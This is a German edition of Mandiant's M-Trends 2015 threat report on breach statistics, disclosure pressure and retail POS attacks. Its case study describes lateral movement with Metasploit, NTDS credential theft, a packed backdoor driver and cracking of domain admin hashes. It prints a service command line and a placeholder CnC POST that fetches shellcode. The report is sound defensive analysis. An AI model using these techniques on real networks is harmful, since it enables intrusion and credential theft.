Dieser Jahresbericht von Mandiant, einem FireEye-Unternehmen, zeigt anhand von Statistiken und Fallstudien neueste Entwicklungen im Bereich Advanced Persistent Threats (APTs) auf.

1. B e r i c h t z u r B e d r o h u n g s l a g e
Ein Bericht von
der Cyberfront
M-Trends®
2015:
Sicherheits-
beratung

2. Ein Bericht von der CyberfrontM-Trends
Einleitung. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1
Die Opfer in Zahlen. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
Trend Nr. 1: Opfer im Rampenlicht. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
Eine gut informierte Öffentlichkeit. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
Steigende Erwartungen. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
Warum werden Angriffe zunehmend bekannt gegeben?. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
Trend Nr. 2: Einzelhändler im Fadenkreuz. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
Virtuelle Anwendungsserver als Einfallstor. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
Neue Tools, Methoden und Prozesse. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
Mehr Angriffe auf Online-Shops in Regionen mit Chip-und-PIN-Authentifizierung. . . . . . . . 7
Empfehlungen. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12
Trend Nr. 3: Raffiniertere Angriffsabläufe. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
Hacken von VPN. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
Bessere Tarnung für Malware . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
Tools und Tricks für den Kennwortdiebstahl . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18
Navigation mit WMI und PowerShell. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19
Trend Nr. 4: Die Grenzen verschwimmen – Kriminelle und APT-Actors
imitieren einander. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20
Im Zeichen der Unsicherheit die Absicht durchschauen – kein leichtes
Unterfangen. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20
Welche Rolle spielen diese Unterschiede? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22
Schlussfolgerung. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
Über Mandiant. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24
Über FireEye. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24
Inhalt

3. www.mandiant.com 1
Einleitung
Bei Mandiant sind wir seit Jahren davon überzeugt, dass es keine
absolute Sicherheit geben kann. Die Ereignisse des Jahres 2014
bestätigen dies.
D
ie Wirksamkeit der Sicherheitsmaßnah­men
in Unternehmen ist im vergangen­en Jahr
leicht gestiegen. Trotzdem geht das Wett­
rüsten zwischen Angreifern und Verteidigern wei­
ter und Hacker finden ständig neue Methoden, um
Sicherheitsmaßnahmen zu um­gehen.
In „M-Trends 2014“ berichteten wir, dass die Cyber­
security sich von einem Thema, an dem einige weni-
ge IT-Verantwortliche interessiert waren, zu einer
der obersten Prioritäten für die Unternehmens­
leitung entwickelt hatte. In diesem Jahr rückte die
Cybersicherheit – oder streng genommen die
Cyber­unsicherheit – in den Blickpunkt der Öffent­
lichkeit. Seit Jahresbeginn 2015 wurde das Thema
von US-Präsident Obama in seiner Ansprache zur
Lage der Nation¹, als Grundlage für einen Holly-
wood-Film² und selbst in einem Gag bei der Verlei-
hung des Gol­den Globe³ aufgegriffen.
Da die Berater von Mandiant nach einem schwerwie-
genden Angriff oft unter den Ersten sind, die eine
kritische Situation analysieren, haben wir einen be-
sonders guten Einblick in die sich ändernden Motive
und Taktiken von Hackern. Wir ar­beiten seit über
zehn Jahren mit Kunden in mehr als 30 Branchen
weltweit zusammen. Die in diesem Dokument prä­
sentierten Erkenntnisse und Analysen beruhen auf
der Erfahrung, die wir bei der Untersuchung Hun-
derter kompromittierter Infrastrukturen gesam-
melt haben.
Unternehmen haben kleine Fortschritte zu verzeichnen,
doch Hacker bleiben noch immer zu lange unentdeckt,
nachdem sie in eine Unternehmens­umgebung ein­
gedrungen sind. Der Mittelwert lag 2014 bei 205
Tagen, im Vergleich zu 229 Tagen im Vorjahr. Der
Anteil der Unternehmen, die ein Eindringen von
Hackern intern aufdeckten, ging sogar leicht zurück:
2014 wurden in 69 Prozent der von uns untersuch­
ten Fälle die betroffenen Unternehmen von der Poli-
zei oder einem anderen Dritten auf die Sicherheits­
verletzung aufmerksam gemacht, 2013 waren es
67 Prozent und im Jahr davor 63 Prozent.
Der Einzelhandel hatte mit den meisten Vorfällen
zu kämpfen, da Angreifer neue Metho­den zum
Stehlen von Kreditkartendaten von POS-Terminals
ausnutzten. In Regionen, wo Kreditkarten mit
einem Prozessorchip und einer PIN geschützt sind,
stieg die Anzahl der Angriffe auf E-Commerce-
Unternehmen und Dienstleister, die Online-
Zahlungen abwickeln.
Mehrere Branchen, in denen wir bislang eher selten
Vorfälle zu verzeichnen hatten, gehörten 2014 zu
den wichtigsten Zielen von Internetkriminellen,
darunter Unternehmens- und Beratungsservices,
das Gesundheitswesen sowie Behörden und inter-
nationale Organisationen.
Wenn Sicherheitsteams neue Abwehrmaßnah­men
installieren, finden Hacker neue Methoden, um sie
zu umgehen. Das zeigte sich auch 2014, als Angrei­
fer neue Methoden bzw. raffiniertere Versionen
bekannter Methoden nutzten, um virtuelle private
Netzwerke (VPN) zu hacken, unentdeckt zu bleiben,
Anmeldedaten zu stehlen und über einen langen
Zeitraum hinweg Zugriff auf die gehackten Umge-
bungen zu erhalten.
Darüber hinaus ging 2014 eine Rekordzahl von Op-
fern der Internetkriminalität an die Öffentlichkeit.
Eine der ersten Fragen, die immer ge­stellt wird, war
dabei schwerer zu beantworten als in der Vergan-
genheit: Wer war das? Die Grenzen zwischen
„gewöhnlichen“ Internetkri­minellen und staatlich
gesponserten Angreifern verschwimmen zuneh-
mend, da Erstere immer raffinierter werden und
Letztere oft gängige Schwarzmarkttools verwen-
den, um in der „Szene“ weniger aufzufallen.
Zusammenfassend lässt sich sagen, dass die Bedro­
hungslage derzeit komplexer ist als je zuvor. Für
Sicher­heitsteams bedeutet das, dass es immer
schwie­riger – und immer wichtiger – wird, Angriffs­
versuche zu entdecken, zu analysieren, abzuwehren
und eventuelle Schäden schnell zu beheben.
1
Michael D. Shear, The New York Times, „Obama to Announce Cybersecurity Plans in State of the Union Preview“, Januar 2015
2
Sheri Linden, The Hollywood Reporter, „Blackhat: Film Review“, Januar 2015
3
Christopher Palmeri, Bloomberg, „Hollywood ‘Spoiled Brats’ Are Easy Targets at Golden Globes“, Januar 2015

4. 2 www.mandiant.com
Ein Bericht von der CyberfrontM-Trends
Mehrere Branchen, in denen wir in früheren
Jahren eher selten Vorfälle untersucht hatten,
gehörten 2014 zu den wichtigsten Zielen von
Internetkriminellen, darunter:
Unternehmens- und Beratungsservices
Staatliche und internationale Organisa-
tionen
Gesundheitswesen
6 %
Gesundheits-
wesen
5 %
Transport-
wesen
3 %
Luft-, Raum-
fahrt- und
Rüstungs-
industrie
7 %
Juristische
Dienstleister
8 %
Sonstige
7 %
IT und andere
High-Tech-
Branchen
8 %
Bau- und Inge-
nieurwesen
17 %
Unternehmens- und
Beratungsservices
7 %
Staatliche und interna-
tionale Organisationen
14 %
Einzelhandel
10 %
Finanzdienstleis-
tungen
3%
8 %
Medien und Unter-
haltung
5%
Mehrere wichtige Branchen waren bei unseren
Untersuchungen deutlich stärker oder weniger
stark vertreten als in den Vorjahren:
Einzelhandel: Anstieg von 4 % auf 14 %
Medien und Unterhaltung: Rückgang
von 13 % auf 8 %
Branchen, in denen Mandiant Angriffe untersuchte
Die Opfer in Zahlen
Hacker nahmen 2014 ein breites Spektrum an Branchen ins Visier, darunter mehre-
re, die in früheren Jahren kaum von Internetkriminalität betroffen waren. Im Schnitt
wurden Angriffe rascher aufgedeckt als 2013, doch die Angreifer konnten noch im-
mer viel zu lange unbemerkt in gehackten Umgebungen ihr Unwesen treiben. Der
Anteil der Opfer, die einen Angriff selbst bemerkten, ging zurück.

5. www.mandiant.com 3
APT-Phishing
der analysierten Phishing-E-Mails
hatten IT- oder sicherheitsrelevante
Themen als Aufhänger. Viele stamm-
ten angeblich von der IT-Abteilung des
angegriffenen Unternehmens oder
einem Anbieter von Antivirensoftware.
78 %
der Phishing-
E-Mails wurden
an Arbeitstagen
versandt.
72 %
So
Sa
Fr
Do
Mi
Di
Mo
Die Bedrohungslage im Überblick
Belästigung Datendiebstahl Internetkriminalität Hacktivismus Sabotage
Ziel
Zugriff und
Verbreitung
ökonomischer bzw.
politischer Vorteil
finanzielle
Bereicherung
Verleumdung,
negative öffentliche
Aufmerksamkeit
Unterbrechung
des Betriebs
Beispiel
Botnetze und
Spam
APT-Gruppen (Advanced
Persistent Threat)
Kreditkarten-
diebstahl
Verunstaltung
der Website
Löschen
von Daten
Gezielter
Angriff
Merkmal
oft automa-
tisiert
anhaltend
oft opportu-
nistisch
auffällig
konflikt-
motiviert
Angreifer verfolgen immer vielfältigere politische und ökonomische Ziele.
Zeit zwischen den ersten nachweisbaren
Spuren eines Angriffs bis zu seiner Feststellung
205 Tage
Mittelwert der Zeitspanne, die Angrei-
fer in gehackten Netzwerken unbemerkt
blieben
24 Tage weniger als 2013
Längste Präsenz: 2982 Tage
So werden Angriffe aufgedeckt
31 %
der Opfer bemerkten
den Vorfall unterneh-
mensintern.
69 %
der Opfer wurden von
einem Dritten auf den
Angriff aufmerksam
gemacht.

6. 4 www.mandiant.com
Ein Bericht von der CyberfrontM-Trends
Trend Nr. 1:
Opfer im Rampenlicht
Nach einem Cyberangriff finden betroffene Unternehmen sich immer häufiger im
Brennpunkt eines Medienspektakels wieder – und sollen alle Einzelheiten des An-
griffs offenlegen.
I
m Verlauf des Jahres 2014 arbeiteten wir
mit über 30 Unternehmen zusammen, die
die Öffentlichkeit über einen Datendiebstahl
informieren mussten – oft im grellen Scheinwer-
ferlicht einer Pressekonferenz. Unserer Erfah­
rung nach tragen bestätigte Informationen über
den Umfang und die Reichweite eines Angriffs
dazu bei, dass das betroffene Unternehmen
kompetent und souverän erscheint. In der Regel
lassen sich dadurch auch das spätere Revidieren
vorangegangener Meldungen und der damit ver-
bundene Verlust an Glaubwürdigkeit vermeiden.
Eine gut informierte Öffentlichkeit
Eine scheinbar endlose Kette von Meldungen über
Datendiebstähle sensibilisierte die Öffent­lichkeit
2014 für die Gefahren und möglichen Auswirkun-
gen gezielter Cyberangriffe. Das führte dazu, dass
bei jeder neuen Enthüllung fundiertere und de-
tailliertere Fragen an die Opfer gestellt wurden. Die
Medien, Partner, Investoren und Kunden wollen
inzwischen weit mehr wissen als wann der Angriff
erfolgte und welche Daten betroffen waren. Sie
verlangen detaillierte Angaben über alles, vom be-
nutzten Malwaretyp bis hin zu den Methoden, mit
denen die Angrei­fer sich den Zugriff auf Unterneh­
mensressour­cen offen halten konnten.
Zudem stehen die Opfer von Cyberangriffen
zuneh­mend unter dem Druck, die Identität des
Angreif­ers bekannt zu geben. Wir werden häufig
schon am ersten Tag einer Untersuchung gefragt,
welche Hackergruppe hinter einem Angriff steckt.
Zu diesem Zeitpunkt haben wir jedoch gerade erst
damit begonnen, die verfügbaren Fakten zusam-
menzutragen. Gleichzeitig wird es immer schwerer,
diese Frage überhaupt zu be­antworten, da die ver-
schiedenen „Verdächtigen“ zunehmend dieselben
Tools benutzen (siehe Trend Nr. 4: „Die Grenzen
verschwimmen – Kriminelle und APT-Actors imitie-
ren einander“ auf Seite 20).
Steigende Erwartungen
Da das öffentliche Interesse an Cyberangriffen
steigt, wird den Verantwortlichen in betroffenen
Unternehmen zunehmend klar, wie wichtig eine
wirksame und konsistente Öffentlichkeitsarbeit ist,
wenn Hacker in die IT-Infrastruktur des Unterneh-
mens eingedrungen sind. Immer mehr Cyberan-
griffe werden öffentlich bekannt gegeben. Für die
Opfer ist das mit schwierigen Ent­scheidungen
darüber verbunden, wie viele Details sie preisgeben
möchten – und diese Ent­scheidungen müssen oft
getroffen werden, wenn noch lange nicht alle Fak-
ten bekannt sind.
Beim Erstellen einer Strategie für die Öffentlichkeitsarbeit ist ein solides Ver-
ständnis des Ausmaßes und der Reichweite des Angriffs unverzichtbar. Nur
so lassen sich das spätere Revidieren vorangegangener Meldungen und
der damit verbundene Verlust an Glaubwürdigkeit vermeiden.

7. www.mandiant.com 5
Beim Erstellen einer Strategie für die Öffentlich-
keitsarbeit ist ein solides Verständnis des Ausma­
ßes und der Reichweite des Angriffs unverzichtbar.
Nur so lassen sich das spätere Revidie­ren vorange-
gangener Meldungen und der damit verbun­dene
Verlust an Glaubwürdig­keit vermei­den.
Zudem fällt es vielen betroffenen Unternehmen
schwer, die Berichterstattung unter Kontrolle zu
behalten. Öffentliche Spekulationen darüber, wie es
den Angreifern gelungen sein könnte, in ein Un-
ternehmen einzudringen, können die Reaktion auf
einen Angriff beispielsweise ernst­haft behindern.
Wir haben in mehreren Fällen beobachtet, dass Si-
cherheitsexperten bereits wertvolle Zeit mit dem
Widerlegen solcher Hypo­thesen verbringen
mussten, noch bevor sie das Ausmaß des Angriffs
abschätzen oder ihn eindämmen konnten.
Warum werden Angriffe zunehmend
bekannt gegeben?
Wir werden oft gefragt, warum sich heute mehr
Unternehmen dafür entscheiden, einen erfolgrei­
chen Angriff bekannt zu geben. Wir können diese
Frage natürlich nicht für jedes Unternehmen defini-
tiv beantworten, aber uns sind zwei Faktoren
bekannt, die diesen Trend fördern: Erstens mussten
wir 2014 im Vergleich zu den Vorjahren häufiger
auf Angriffe reagieren, bei denen Kreditkarten- und
andere personenbezogene Daten gestohlen wur­
den. Viele Unternehmen müssen solche Fälle
bekannt geben, weil gesetzliche Bestimmungen
dies vorschreiben.
Zweitens wurden 69 Prozent der Angriffe, die wir
2014 untersuchten, nicht vom Opfer selbst aufge-
deckt, sondern von einem unternehmensexternen
Dritten, beispielsweise einem Zulieferer, Kunden
oder den Ermittlungsbehörden.
Mit anderen Worten: Die Verantwortlichen in den
betroffenen Unternehmen mussten davon ausge­
hen, dass nicht nur sie selbst und die Angreifer
wussten, dass ein Angriff stattgefunden hatte.
Unabhängig davon, ob die Öffentlichkeit über einen
erfolgreichen Angriff informiert werden soll oder
nicht, verlangen die Entscheidungs­trä­ger innerhalb
des Unternehmens natürlich Antworten auf zahl­
reiche Fragen – und zwar sofort. Die Untersuchung
kann jedoch Wochen oder sogar Monate dauern
und die zur Beantwortung dieser Fragen erforder­
lichen Fakten schälen sich oft erst im Verlauf der
Untersuchung heraus. Deshalb ist es wichtig, das
Ausmaß und die Reichweite eines Sicherheitsvor-
falls zu kennen, bevor über die Strategie für die
Bekanntgabe der Details entschieden wird.
Fazit : Die Opfer von Cyberangriffen gehen heute mit größerer Wahrscheinlich­
keit an die Öffentlichkeit als früher. Das Medieninteresse ist dabei oft groß. Repor­
tern, Kunden und Geschäftspartnern ist zunehmend bewusst, dass nicht alle Angrif­
fe abgewehrt werden können. Gleichzeitig verlangen sie jedoch mehr Informatio­
nen und stellen detailliertere Fragen als noch vor wenigen Jahren. Unternehmen
benö­tigen eine effektive Strategie für die Öffentlichkeitsarbeit, um sich auf die da­
raus resultieren­den Diskussionen vorzubereiten. Die besten Strategien basieren
auf Fakten aus der gründlichen Untersuchung des Vorfalls.

8. 6 www.mandiant.com
Ein Bericht von der CyberfrontM-Trends
Effektive Untersuchung
von Vorfällen
Im Folgenden finden Sie einige häufig gestellte Fragen von Reportern, Investoren,
Kunden und anderen Interessenten an Unternehmen, die Hackern zum Opfer
gefallen sind. Alle Entscheidungsträger und sonstigen Personen, die für das Unter­
nehmen sprechen, sollten die genauen Antworten auf diese Fragen verstehen, um
die Verbreitung mehrdeutiger oder inkonsistenter Informationen zu vermeiden.
Wie sind die Angreifer in Ihre Infrastruk­
tur eingedrungen?
Angreifer nutzen in der Regel eine Kombination aus Social
Engineering und einer oder mehreren Schwachstellen, die
noch nicht bekannt bzw. behoben sind. Als Einfallstor dient
dabei beispielsweise ein mit dem Internet verbundener
Server oder ein Malware-Anhang in einer E-Mail, der echt
genug aussieht, um vom Empfänger geöffnet zu werden.
Manche Angreifer infizieren sogar Websites, die von ihren
anvisierten Opfern häufig besucht werden. Es ist wichtig,
dass ein Unternehmenssprecher erklären kann, wie die
Angreifer in die Infrastruktur des Unternehmens einge­
drungen sind. Noch wichtiger ist möglicherweise, dass er
oder sie auch sagen kann, ob dieses Einfallstor geschlos-
sen und die Bedrohung eingedämmt wurde.
Wie haben die Angreifer sich den Zugang
zu Ihrer Infrastruktur offengehalten?
Angreifer versuchen meist, sich dauerhaften Zugang zu
einer Umgebung zu verschaffen. Um sie vollständig aus
Ihrer Infrastruktur zu entfernen, müssen Sie alle genutz-
ten Einfallstore finden und schließen. Zu den meistgenutz-
ten Einfallstoren gehören sogenannte Backdoors, Web-
shells sowie der Zugang zu Ihrem VPN und anderen Syste-
men für den Fernzugriff.
Wie ist der Angriff abgelaufen?
Wenn Sie nachvollziehen können, wie ein Angreifer in Ihre
Infrastruktur eindringen und Daten stehlen konnte, haben
Sie den ersten Schritt zur künftigen Abwehr ähnlicher An-
griffe getan. Außerdem ist es schwierig, die Auswirkungen
eines Angriffs zu ermitteln und zu beheben, wenn Sie das
genaue Ausmaß des Angriffs nicht kennen.
Welche Daten wurden gestohlen?
Um herauszufinden, welche Daten die Angreifer kopiert
und entwendet haben, ist meist eine forensische Analyse
der betroffenen Systeme erforderlich. Mitunter kann
selbst eine solche Analyse diese Frage nicht vollständig
beantworten.
Sie sollten in jedem Fall Ihre Rechtsabteilung einbeziehen,
um zu ermitteln, welche gesetzlichen Verpflichtungen sich
aufgrund der Art der gestohlenen bzw. möglicherweise
gestohlenen Daten für Ihr Unternehmen ergeben.
Haben Sie den Vorfall eingedämmt?
Wer die ersten vier Fragen beantworten kann, hat gute
Voraussetzungen für die Beantwortung dieser Frage.
Wenn Sie den Plan der Angreifer und den Verlauf des An-
griffs aufgedeckt haben, können Sie besser auf den Angriff
reagieren und mit der Schadensbehebung beginnen.

9. www.mandiant.com 7
4
U.S. Department of Homeland Security and U.S. Secret Service: „Backoff Malware: Infection Assessment“, August 2014
Trend Nr. 2:
Einzelhändler im Fadenkreuz
Allein im Jahr 2014 wurden bei über 1000 Einzelhändlern Kundendaten gestohlen,
sodass unzählige Kunden ihre Kreditkarten ersetzen lassen mussten.4
Neben der
riesigen Anzahl der Angriffe fielen unseren Analysten auch mehrere neue Angrei­
fergruppen auf, die diese gebeutelte Branche mit speziellen Tools und Methoden
ins Visier nehmen.
Virtuelle Anwendungsserver als
Einfallstor
Mithilfe der Anwendungsvirtualisierung lassen sich
virtuelle Desktops konfigurieren, bei denen Benut-
zer sich per Fernzugriff anmelden, um ei­nen be-
grenzten Zugriff auf bestimmte Program­me zu er­
halten. Bei korrekter Konfiguration ist ein virtueller
Desktop vollständig von dem physi­schen Server ab-
geschirmt, auf dem er ausgeführt wird. Die Benut-
zer kommen also nicht aus dem virtuellen Desktop
„heraus“ und haben keinen direkten Zugriff auf den
physischen Server. In manchen Fällen entstehen je-
doch schon durch kleine Konfigurationsfehler Lü­
cken in der Abschirmung, die es Angreifern ermögli-
chen, aus der virtuellen Umgebung „auszubrechen“
und sich direkten Zugriff auf den physischen Server
zu verschaffen.
In jedem von uns untersuchten Fall mit diesem An-
griffsmuster wurde dieselbe Schwachstelle ausge­
nutzt: Für den Fernzugriff auf die Anwen­dung wa­
ren nur ein Benutzername und Kenn­wort erforder-
lich. Mit Zwei-Faktor-Authentifizierung lässt sich
dieses Einfallstor nahezu vollständig schließen.
Neue Tools, Methoden und Prozesse
Die von uns beobachteten neuen Angreifergruppen
nutzten auch neue Tools, Methoden und Prozesse.
Die Expertise der Angreifer deckte das gesamte
Spektrum ab, von Anfängern mit gängigen Schwarz­
markttools bis hin zu technisch versierten Gruppen
mit raffinierter, speziell auf be­stimmte POS-Syste­
me abgestimmter Malware zum Abschöpfen von
Kreditkartendaten.
Wir konnten keinen Zusammenhang zwischen den
Fähigkeiten und dem Erfolg der Angreifer feststel-
len. Insbesondere für US-amerikanische Einzel­
händler erwies sich Standardmalware vom
Schwarz­markt für den Diebstahl von Kreditkarten-
daten als ebenso gefährlich wie „professionelle“
Produkte. Jede der von uns untersuchten Angrei­
fergruppen konnte die Umgebung ihres Opfers
unbemerkt ausspionieren, sich Zugang zu den
POS-Terminals verschaffen und die Malware für
den Diebstahl der Kreditkartendaten installieren.
Mehr Angriffe auf Online-Shops
in Regionen mit Chip-und-PIN-
Authentifizierung
Während POS-Terminals in Europa und vielen an-
deren Regionen längst einen in der Kreditkarte ent­
haltenen Prozessorchip und eine PIN zur Authenti­
fizierung nutzen, hat sich das nach sei­nen Entwick­
lern Europay, MasterCard und Visa benannte EMV-
Verfahren in den USA noch immer nicht durchge-
setzt. Das soll sich nun endlich ändern.
EMV-fähige Kreditkarten generieren einen eindeu­
tigen Code für jede Transaktion und erschweren
Hackern das Fälschen von Trans­aktionen dadurch
erheblich. Möglicherweise konzentrieren sich
Cyber­kriminelle stattdessen auf leichtere Beute. In
Ländern, in denen standardmäßig EMV verwendet
wird, untersuchten wir 2014 im Vergleich zu frühe­
ren Jahren eine größere Anzahl von Angriffen auf
E-Commerce-Unternehmen und Dienstleister, die
Online-Zahlungen abwickeln.

10. 8 www.mandiant.com
Ein Bericht von der CyberfrontM-Trends
Fallstudie
Bei einem Hackerangriff auf eine große US-amerikanische Kaufhauskette wurden
die Daten von Millionen von Kreditkarten gestohlen
Dieser Angriff ist typisch für eine Ma­sche,
der 2014 eine Reihe US-amerika­nischer
Einzelhändler zum Opfer fielen: Die An-
greifer verschafften sich mit gültigen An-
meldedaten per Fernzugriff Zugang zu ei-
nem System des Opfers und nutzten dann
dessen Intranet, um Malware auf den
POS-Terminals in den Ladengeschäften zu
installieren. Im hier beschriebenen Fall
bemerkte das Opfer den Angriff erst, als
Behörden drei Mo­nate später darauf auf-
merksam mach­ten.
Eindringen in das Netzwerk
Der Angreifer meldete sich mit gültigen
Anmeldedaten bei einem Anwendungs-
server der Kaufhauskette an und erhielt
einen virtuellen Desktop mit begrenzten
Privilegien. Wir konnten keine Anzeichen
für fehlgeschlagene Anmeldeversuche fin-
den und gehen daher davon aus, dass er
sich die Anmeldedaten vor dem Angriff
beschafft hatte. Wie ihm das gelang, geht
aus den uns vorliegenden Daten nicht
hervor.
Der Angreifer nutzte dann einen klei­nen
Fehler in der Konfiguration des virtuellen
Desktops aus, um sich zusätzliche Zu-
griffsrechte zuzuweisen, darun­ter Zugang
zu einem Befehlszeilentool, mit dem er di-
rekt auf dem Anwendungs­server Befehle
ausführen konnte. Damit lud er über
Windows FTP ein Tool zum Kopieren von
Kennwörtern herunter, mit dem er in den
Besitz des Administratorkennworts für
den Anwendungsserver gelangte. Alle
Syste­me im Intra­net der Kaufhauskette
nutzten dasselbe Administratorkennwort.
All das dauerte nur wenige Minuten.
Ausspionieren und Infizieren
des Netzwerks
Der Angreifer nutzte zunächst das Frame-
work Metasploit, um die Infra­struktur des
Opfers auszuspionieren. Metasploit ist ein
Open-Source-Framework für Penetra-
tionstests, das eine riesige Auswahl an
Modulen zum Aufdecken und Ausnutzen
von Schwachstellen enthält. Dank dieser
Vielfalt erfre­ut es sich sowohl bei Sicher-
heitsexperten als auch bei Internetkrimi-
nellen großer Beliebtheit.
Im vorliegenden Fall wurde das Modul
psexec_command genutzt, mit dem Be­fehle
als Windows-Service auf einem anderen
System ausgeführt werden können. Alle
Aktionen von psexec_command werden in
den Logdateien des Systems protokolliert,
auf dem sie ausgeführt werden.
Der Angreifer durchsuchte weiterhin Sys-
teme im Intranet, konzentrierte sich aber
zunehmend auf den Domänencontroller
der Zentraldomäne des Unternehmens-
netzwerks. Ein Domänencontroller ist ein
Server, der zur Administration der Au-
thentifizierung in einer Windows-Umge-
bung benötigt wird. Dieser Domänencon-
troller hatte dasselbe Administratorkenn­
wort wie der zuerst gehackte Server und
war daher eine leichte Beute. Der Angrei­
fer nutzte das Metasploit-Modul ntdsgrab,
um die NTDS-Datenbank und System
Registry Hive zu kopieren.
Die NTDS-Datenbank enthält für den
Domänencontroller wichtige Daten über
Active Directory, unter anderem Benut-
zernamen und Kennwort-Hashes. Das
Modul ntdsgrab nutzt den Volume Shadow
Copy Service (VSS), um eine Schattenko­
pie der Partition zu erstellen, auf der die
NTDS-Datenbank gespei­chert ist. Der
eigentl­iche Zweck von VSS ist das Erstel-
len legitimer Momentaufnahmen für die
Datensicherung und -wiederherstellung.
Der Angreifer missbrauchte den Dienst
jedoch, um die NTDS-Datenbank zu steh­
len. Im Anschluss nutzte er andere Tools,
um die Kennwort-Hashes der Domänen-
administratoren zu finden und zu knacken.
Damit stand ihm praktisch die gesamte
Umgebung offen.
Der Angreifer stieg nun auf altbewährte
Methoden zum Ausspionieren von Netz­
werken um, darunter nicht interaktive An-
meldeversuche, das Tool PsExec aus den
Microsoft SysInternals und Anmeldever-
suche über das Remote Desktop Protocol
(RDP). Nachdem er sich mit den Anmelde-
daten des Domänenadministrators auf
einem virtualisierten Anwendungsserver
angemeldet hatte, konnte der Angreifer
sich via RDP mit umfangreichen Zugriffs-
rechten auf anderen Systemen einloggen.
Einrichten von Backdoors
Der Angreifer richtete auf mehreren ge­
hackten Systemen „Hintertüren“ ein, um
sich dauerhaft Zugang zu ihnen zu sichern.
Dazu nutzte er einen schädlichen Geräte-
treiber, der speziell für Windows XP ent­
wickelt wurde.
Dieser Gerätetreiber wurde zur Übertra-
gung mit einem raffinierten Packer kom-
primiert, der vergleichbaren Tools in hoch
entwickelter, aber gängiger Malware äh-
nelte. Der Gerätetreiber extrahiert sich
zunächst im Arbeits­speicher und startet
dann einen neuen System-Thread.
Daraufhin schickt der entsprechende legi-
time Gerätetreiber eine Nachricht an das
System, dass er nicht geladen werden
konnte. Da die Malware in einem anderen
Prozess ausgeführt wird als der legitime
Gerätetreiber, erkennt das System den
zusätzlichen Gerätetreiber nicht. Durch
diese Verschleie­rungstaktik wird die Ana­
lyse der Malware und ihrer Funktionen
erschwert.

11. www.mandiant.com 9
So funktioniert
psexec_command
Der auszuführende Befehl und eine Text­
datei für die Ausgabe werden in eine
Windows-Batchdatei geschrieben. Die
Ausgabe- und die Batchdatei erhalten
von einem Zufallsgenerator generierte
Namen, die je 16 Zeichen lang sind.
Die Batchdatei wird ausgeführt.
Abbildung 1 zeigt, was dabei im System­
ereignisprotokoll von Windows aufge­
zeichnet wird.
Abbildung 1: Das Metasploit-Modul psexec_command installiert einen Service.
A service was installed in the system.
Service Name: MRSWxwQmQxFGumEFsW
Service File Name: %COMSPEC% /C echo dir ^> %SYS-
TEMDRIVE%WINDOWSTempTthwsVKvUhydrsNB.txt >
WINDOWSTempRbhRmgALAHcdyWXG.bat & %COMSPEC% /C
start %COMSPEC% /C WINDOWSTempRbhRmgALAHcdyWXG.
bat
Service Type: user mode service
Service Start Type: demand start
Die Funktionen dieser Backdoor befinden
sich in Shellcode, den der Gerätetreiber in
Prozesse einschleust, die im Benutzer-
bereich, also außerhalb des Windows-
Kernels, ausgeführt werden. Dieser Shell-
code schickt dann eine HTTP-POST-Ab-
frage an eine hartkodierte IP-Adresse und
lädt einen HTML-Kommentar herunter,
der mit XOR kodierten Shellcode enthält.
Dank dieser Methode war die Backdoor
sehr vielseitig einsetzbar. Wenn der An-
greifer neue Funktionen benötigte, konn­
te er einfach neuen Shellcode herunter-
laden und ausführen. Diese Nutzung von
Shellcode ist nicht neu, aber durch die
Kombination mit dem Packer war sie we­
sentlich schwerer zu finden als ältere
Varianten.
Abbildung 2 zeigt die Kommunikation
zwischen der Backdoor und dem
Command-und-Control-Server (CnC-
Server).
Datendiebstahl
Nachdem er das Kennwort des Domänen-
administrators geknackt hatte, stand dem
Angreifer die gesamte Windows-Umge-
bung der Kaufhauskette offen.
Abbildung 2: Kommunikation zwischen CnC-Server und Backdoor
POST /evil.txt HTTP/1.0
Accept: */*
Content-Length: 32
Content-Type: application/octet-stream
User-Agent: Evil_UA_String
Host: 1.2.3.4
Pragma: no-cache
<POST_DATA>
<!-XOR_Encoded_Shellcode -->
Backdoor schickt HTTP-POST-
